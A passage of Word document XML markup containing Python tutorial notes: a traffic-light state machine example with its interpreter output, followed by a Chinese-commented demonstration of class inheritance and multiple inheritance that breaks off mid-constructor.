      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class TrafficLightMachine(StateMachine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B66B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "A traffic light machine"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E804ACE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    green = State('Green', initial=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC28FE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    yellow = State('Yellow')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516C324" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    red = State('Red')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05492774" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627B4BDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    cycle = green.to(yellow) | yellow.to(red) | red.to(green)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19EBAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1072FA88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def on_enter_green(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601ED1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Valendo!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1D30A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023A0340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def on_enter_yellow(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B4ED9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Calma, l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C8ED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B707476" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def on_enter_red(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64309D75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('Parou.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381577B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9E2B4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; stm = TrafficLightMachine()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F00CEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; stm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CC5C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calma, l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AC296E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; stm.cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE1508" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Parou.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639DD53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; stm.cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC9816" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Valendo!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73936326" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>==========================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F9CDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2141D86D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76189719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2869A18E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多重继承</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776787A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类定义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CBB495" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class people:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBAAD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义基本属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6435FDD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06579472" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    age = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E69880" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义私有属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私有属性在类外部无法直接进行访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71756474" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    __weight = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B9CF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0AB7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,a,w):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F7708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name = n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47265695" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.age = a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D46287" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.__weight = w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D4AB11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def speak(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B34C5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("%s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>岁。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" %(self.name,self.age))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00859DE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210752AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单继承示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB93B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class student(people):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5D87F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    grade = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534DED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,a,w,g):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78559566" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用父类的构函</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06516C35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        people.__init__(self,n,a,w)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0F45C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.grade = g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B55B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆写父类的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01346E0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    def speak(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536ECC60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("%s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>岁了，我在读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"%(self.name,self.age,self.grade))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA36F0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E7DB15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个类，多重继承之前的准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC5F30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class speaker():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C94DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    topic = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44980016" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16481400" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,t):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66340CD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name = n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD1022" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.topic = t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0D081" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    def speak(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BAAEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我是一个演说家，我演讲的主题是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> %s"%(self.name,self.topic))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8F334" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A86F911" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多重继承</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DDFA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>class sample(speaker,student):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4A321C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    a =''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B711C3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,a,w,g,t):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550F40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        student.__init__(self,n,a,w,g)</w:t>
      </w:r>
    </w:p>
